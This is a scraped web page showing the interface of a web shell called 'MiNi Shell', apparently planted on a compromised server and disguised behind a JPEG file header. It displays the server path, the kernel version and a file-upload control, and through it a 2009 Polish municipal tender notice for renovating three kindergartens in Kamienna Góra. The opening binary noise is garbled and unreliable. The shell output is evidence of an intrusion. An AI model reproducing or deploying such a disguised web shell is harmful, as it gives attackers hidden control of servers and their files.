JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/133196-N-2009.html

<p class="kh_header"><b>Kamienna Góra: Remont budynków przedszkoli publicznych przy ul. Spacerowej, Kościuszki i Papieża Jana Pawła II w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 133196 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kamienna Góra , Plac Grunwaldzki 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 6455124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamiennagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynków przedszkoli publicznych przy ul. Spacerowej, Kościuszki i Papieża Jana Pawła II w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont budynków przedszkoli publicznych zlokalizowanych w Kamiennej Górze przy ul. Spacerowej 12, Kościuszki 4 i Papieża Jana Pawła II 20.

Zakres robót budowlanych obejmuje prace termomodernizacyjne budynków oraz przebudowę i remont części wewnętrznych instalacji elektrycznych i centralnego ogrzewania.

Zamówienie obejmuje trzy części. Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.

Część I zamówienia:

Remont Przedszkola Publicznego nr 1 przy ul. Spacerowej 12 (budynek 1 oraz budynek 2) obejmuje:
- wzmocnienia i naprawy pęknięć ścian osłonowych
- docieplenie ścian zewnętrznych i ścian fundamentowych wraz z izolacją przeciwwodną
 docieplenie stropodachu (natrysk twardą pianką poliuretanową lub montaż płyt izolacyjnych warstwowych) wraz z wymianą obróbek blacharskich
- przemurowanie kominów ponad dachem i części przewodów kominowych
- wykonanie instalacji odgromowej
- wymianę stolarki okiennej na okna z PCV wraz z parapetami
- wymianę instalacji centralnego ogrzewania z zachowaniem istniejącego przyłącza ciepła
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ
- wykonanie chodnika z kostki betonowej wokół budynku i opaski betonowej wzdłuż ścian zewnętrznych

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynków;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Wykonawca przed zawarciem umowy zobowiązany będzie do przygotowania harmonogramu rzeczowo - finansowego, sporządzonego według załączonego wzoru. Harmonogram winien uwzględniać termin realizacji zaproponowany przez Wykonawcę oraz cenę oferty.

Zamawiający informuje, że w miesiącach lipcu i sierpniu przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynków, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane we wrześniu z uwagi na to, że od tego miesiąca w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części I Przedmiotu zamówienia są:
1. Dokumentacja projektowa, odrębna dla każdego z budynków
2. Specyfikacje techniczne wykonania i odbioru robót, odrębne dla każdego z budynków
3. Przedmiary robót odrębne dla każdego z budynków 
4. Wzór harmonogramu rzeczowo - finansowego. 

Część II zamówienia:

Remont Przedszkola Publicznego nr 2 przy ul. Kościuszki 4 obejmuje:
- wymianę części stolarki okiennej na okna z PCV i drewniane wraz z parapetami
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynku;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Zamawiający informuje, że od 29 czerwca do 1 sierpnia przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynku, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane w sierpniu z uwagi na to, że od tego miesiąca w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części II Przedmiotu zamówienia są:
1. Dokumentacja projektowa
2. Specyfikacja techniczna wykonania i odbioru robót 
3. Przedmiar robót

Część III zamówienia:

Remont Przedszkola Publicznego nr 3 przy ul. Papieża Jana Pawła II 20 obejmuje:
- docieplenie ścian poddasza oraz części ścian szczytowych od wewnątrz 
- docieplenie stropu nad ostatnią kondygnacją
- naprawa pokrycia dachu z papy termozgrzewalnej
- wymianę części stolarki okiennej na okna z PCV wraz z parapetami
- wymianę instalacji centralnego ogrzewania z zachowaniem istniejącego przyłącza ciepła
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynku;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja;

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Zamawiający informuje, że od 20 lipca do 22 sierpnia przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynku, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane w czasie, w którym przedszkole będzie czynne; w tym czasie w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części III Przedmiotu zamówienia są:
1. Dokumentacja projektowa
2. Specyfikacja techniczna wykonania i odbioru robót 
3. Przedmiar robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.40.00.00-1, 45.33.11.00-7, 45.32.10.00-3, 45.31.57.00-5, 45.26.27.00-8, 45.11.10.00-8, 45.26.25.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania działalności lub czynności.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
a) wykonali należycie w ciągu ostatnich 5 lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie podobne, tj takie którego przedmiotem był remont budynku użyteczności publicznej, o wartości nie mniejszej niż:
- 500 tys. zł brutto - dla Części I zamówienia,
- 200 tys. zł brutto - dla Części II zamówienia,
- 50 tys. zł brutto - dla Części III zamówienia
(w przypadku Wykonawców zagranicznych Zamawiający dokona przeliczenia waluty obcej na PLN według średniego kursu ogłoszonego przez Narodowy Bank Polski na dzień otwarcia ofert),
b) dysponują osobami, które posiadają uprawnienia do kierowania robotami budowlanymi stosownie do przepisów Ustawy z dnia 7 lipca 1994 roku Prawo budowlane (tj. Dz. U. Nr 156, poz. 1118 z 2006 roku z późniejszymi zmianami) i zakresu niniejszego zamówienia, w tym kierownikiem budowy - odpowiednio do Części, w której składana jest oferta,
c) dysponują osobami posiadającymi uprawnienia do wykonania robót w zakresie objętym przedmiotem zamówienia - co najmniej po 1 osobie z uprawnieniami w specjalności konstrukcyjno-budowlanej, instalacji elektrycznych oraz sanitarnych - odpowiednio do Części, w której składana jest oferta.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy.

Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów, dokona oceny spełniania warunków podmiotowych według formuły spełnia - nie spełnia. 
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków Wykonawcy zobowiązani są do przedstawienia w ofercie następujących oświadczeń i dokumentów:
1. Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wykaz robót budowlanych wykonanych przez Wykonawcę w ciągu ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia - odpowiednio do Części, w której składana jest oferta.
4. Opinie dotyczące jakości robót, wystawione przez zamawiających te roboty.
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z dokumentami stwierdzającymi posiadanie przez nie uprawnień zawodowych, w tym dla osoby pełniącej funkcję kierownika budowy - dokumenty stwierdzające posiadanie uprawnień zawodowych do pełnienia funkcji kierownika budowy wraz z aktualnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego - odpowiednio do Części, w której składana jest oferta.
6. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5. Wykonawca wskazał osoby, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kamiennagora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
(Wydział Zamówień Publicznych, Inwestycji i Funduszy Zewnętrznych, pok. 308).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 11:30, miejsce: Urząd Miasta Kamienna Góra
Plac Grunwaldzki 1
58-400 Kamienna Góra
Sekretariat (pok. 209).</p><p><b>IV.3.5) Termin związania ofertą:</b> do 30.06.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont budynku Przedszkola Publicznego Nr 1 przy ul. Spacerowej 12 w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont Przedszkola Publicznego nr 1 przy ul. Spacerowej 12 (budynek 1 oraz budynek 2) obejmuje:
- wzmocnienia i naprawy pęknięć ścian osłonowych
- docieplenie ścian zewnętrznych i ścian fundamentowych wraz z izolacją przeciwwodną
- docieplenie stropodachu (natrysk twardą pianką poliuretanową lub montaż płyt izolacyjnych warstwowych) wraz z wymianą obróbek blacharskich
- przemurowanie kominów ponad dachem i części przewodów kominowych
- wykonanie instalacji odgromowej
- wymianę stolarki okiennej na okna z PCV wraz z parapetami
- wymianę instalacji centralnego ogrzewania z zachowaniem istniejącego przyłącza ciepła
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ
- wykonanie chodnika z kostki betonowej wokół budynku i opaski betonowej wzdłuż ścian zewnętrznych

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynków;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Wykonawca przed zawarciem umowy zobowiązany będzie do przygotowania harmonogramu rzeczowo - finansowego, sporządzonego według załączonego wzoru. Harmonogram winien uwzględniać termin realizacji zaproponowany przez Wykonawcę oraz cenę oferty.

Zamawiający informuje, że w miesiącach lipcu i sierpniu przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynków, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane we wrześniu z uwagi na to, że od tego miesiąca w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części I Przedmiotu zamówienia są:
1. Dokumentacja projektowa, odrębna dla każdego z budynków
2. Specyfikacje techniczne wykonania i odbioru robót, odrębne dla każdego z budynków
3. Przedmiary robót odrębne dla każdego z budynków 
4. Wzór harmonogramu rzeczowo - finansowego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.26.25.00-6, 45.40.00.00-1, 45.33.11.00-7, 45.32.10.00-3, 45.31.57.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont budynku Przedszkola Publicznego Nr 2 przy ul. Kościuszki 4 w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont Przedszkola Publicznego nr 2 przy ul. Kościuszki 4 obejmuje:
- wymianę części stolarki okiennej na okna z PCV i drewniane wraz z parapetami
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynku;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Zamawiający informuje, że od 29 czerwca do 1 sierpnia przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynku, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane w sierpniu z uwagi na to, że od tego miesiąca w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części II Przedmiotu zamówienia są:
1. Dokumentacja projektowa
2. Specyfikacja techniczna wykonania i odbioru robót 
3. Przedmiar robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.26.27.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont budynku Przedszkola Publicznego Nr 3 przy ul. Papieża Jana Pawła II 20 w Kamiennej Górze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont Przedszkola Publicznego nr 3 przy ul. Papieża Jana Pawła II 20 obejmuje:
- docieplenie ścian poddasza oraz części ścian szczytowych od wewnątrz 
- docieplenie stropu nad ostatnią kondygnacją
- naprawa pokrycia dachu z papy termozgrzewalnej
- wymianę części stolarki okiennej na okna z PCV wraz z parapetami
- wymianę instalacji centralnego ogrzewania z zachowaniem istniejącego przyłącza ciepła
- przebudowę instalacji elektrycznej w zakresie wymiany tablic rozdzielczych i WLZ

Poza pracami określonymi powyżej do obowiązków Wykonawcy należeć będzie:
- wystąpienie i uzyskanie zgody na zajęcie pasa ruchu drogowego, w przypadku zaistnienia takiej potrzeby podczas wykonywania robót na elewacji budynku;
- wywiezienie wszystkich materiałów z rozbiórek i ich utylizacja;

Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane roboty.

Zamawiający informuje, że od 20 lipca do 22 sierpnia przedszkole będzie nieczynne i w czasie wykonywania prac budowlanych wewnątrz budynku, w przedszkolu nie będą przebywały dzieci. Roboty zewnętrzne winny być wykonywane w czasie, w którym przedszkole będzie czynne; w tym czasie w przedszkolu będą przebywać dzieci. W okresie tym Wykonawca zobowiązany będzie do zastosowania szczególnych środków zabezpieczenia budowy i zachowania ostrożności przy pracach budowlanych.

Załącznikami do opisu Części III Przedmiotu zamówienia są:
1. Dokumentacja projektowa
2. Specyfikacja techniczna wykonania i odbioru robót 
3. Przedmiar robót.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.40.00.00-1, 45.33.11.00-7, 45.32.10.00-3, 45.31.57.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com